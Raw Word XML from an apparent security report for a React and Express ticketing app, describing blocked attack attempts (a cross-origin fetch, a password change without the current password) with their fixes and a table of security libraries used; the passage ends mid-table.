    <w:p w14:paraId="7E6E8BB5" w14:textId="7B62350E" w:rsidR="002B2C87" w:rsidRPr="002B2C87" w:rsidRDefault="002B2C87" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Attempt: </w:t>
      </w:r>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fetch("http://localhost:5000/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/tickets")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F2ADDD" w14:textId="77777777" w:rsidR="002B2C87" w:rsidRPr="002B2C87" w:rsidRDefault="002B2C87" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>From a malicious domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073B4C4D" w14:textId="74C6D279" w:rsidR="002B2C87" w:rsidRPr="002B2C87" w:rsidRDefault="002B2C87" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fix</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Only allow your React client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EACA64" w14:textId="77777777" w:rsidR="002B2C87" w:rsidRPr="002B2C87" w:rsidRDefault="002B2C87" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">origin: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>process.env.CLIENT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_ROOT_URL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> || "http://localhost:3000"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB013FE" w14:textId="0065AA61" w:rsidR="002B2C87" w:rsidRDefault="002B2C87" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r w:rsidR="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/server/server.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F96C4E" w14:textId="77777777" w:rsidR="001A651C" w:rsidRPr="002B2C87" w:rsidRDefault="001A651C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="575F0900" w14:textId="2BD2B518" w:rsidR="00EE11A0" w:rsidRPr="004E318F" w:rsidRDefault="00EE11A0" w:rsidP="00EE11A0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc214584812"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>Password Change Exploit Attempt</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="7E8B9295" w14:textId="46375BCA" w:rsidR="002B2C87" w:rsidRPr="002B2C87" w:rsidRDefault="002B2C87" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Attempt: </w:t>
      </w:r>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Change password without current password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086DC426" w14:textId="57050246" w:rsidR="002B2C87" w:rsidRPr="002B2C87" w:rsidRDefault="002B2C87" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fix</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>auth.js checks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760A9B9A" w14:textId="77777777" w:rsidR="002B2C87" w:rsidRPr="002B2C87" w:rsidRDefault="002B2C87" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(!await</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>user.comparePassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>currentPassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10004CD2" w14:textId="77777777" w:rsidR="002B2C87" w:rsidRPr="002B2C87" w:rsidRDefault="002B2C87" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   return error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CBB4C2" w14:textId="45E20C19" w:rsidR="00EE11A0" w:rsidRPr="00BE7BE3" w:rsidRDefault="002B2C87" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Files</w:t>
      </w:r>
      <w:r w:rsidR="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/server/routes/auth.js</w:t>
      </w:r>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>Frontend: App.js modal + fetch POST request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18141F8B" w14:textId="157D0661" w:rsidR="00EE11A0" w:rsidRDefault="00EE11A0" w:rsidP="008907AE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc214584813"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>Security Features Implemented</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>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647"/>
        <w:gridCol w:w="2867"/>
        <w:gridCol w:w="3407"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F13D01" w:rsidRPr="00F13D01" w14:paraId="53D11D8D" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60C347E1" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Security Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EA9639F" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Library Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="035F9F49" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Reason for Use (Why Used)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="066E62CE" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>File Location(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F13D01" w:rsidRPr="00F13D01" w14:paraId="4A3B3E7F" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18678437" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>XSS Prevention / HTML Sanitization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5647EB3A" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>sanitize-html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2017E138" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>Removes harmful HTML/JS tags from user input to prevent stored XSS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F27F051" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>server/routes/tickets.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F13D01" w:rsidRPr="00F13D01" w14:paraId="1F80A942" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DD97DA1" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Input Validation (Backend)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BB56E1D" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F13D01">
              <w:t>express-validator</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A4E4C90" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>Validates and sanitizes input fields such as email, password, title, category, etc. Prevents malformed and malicious input.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28DC1E3C" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>server/routes/auth.js, server/routes/tickets.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F13D01" w:rsidRPr="00F13D01" w14:paraId="6DF2226D" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25EA0B11" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Schema Validation (Strict)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EB74699" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>Joi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="781C10A1" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>Strong schema enforcement for ticket creation, ensuring all fields follow expected patterns. Prevents injection and malformed data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67B6E167" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>server/routes/tickets.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F13D01" w:rsidRPr="00F13D01" w14:paraId="30F1873A" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D1FB305" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>NoSQL Injection Protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4423B7BC" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>Custom middleware (no external lib)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="294C76F3" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>Removes MongoDB operators ($</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F13D01">
              <w:t>, .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F13D01">
              <w:t>) from request body/params, preventing NoSQL operator injection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="757BFEF9" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t xml:space="preserve">server/server.js (middleware </w:t>
            </w:r>
